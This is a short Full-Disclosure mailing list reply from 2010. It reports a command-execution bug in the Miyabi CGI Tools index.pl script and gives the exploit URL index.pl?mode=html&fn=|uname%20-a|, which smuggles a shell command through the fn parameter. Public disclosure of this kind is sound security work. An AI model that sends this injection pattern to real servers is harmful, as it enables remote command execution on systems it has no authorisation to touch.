Re: Miyabi CGI Tools index.pl command execution

[Marshall Whittaker <marshallwhittaker () gmail com>]

LuLz I forgot to tell how to exploit...

index.pl?mode=html&fn=|uname%20-a|

2010/6/29 Marshall Whittaker <marshallwhittaker () gmail com>

> The Miyabi CGI Tools index.pl CGI script suffers from the pipe bug. The
> script is attached. It's all in Japanese (I think), I can't read the
> comments.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/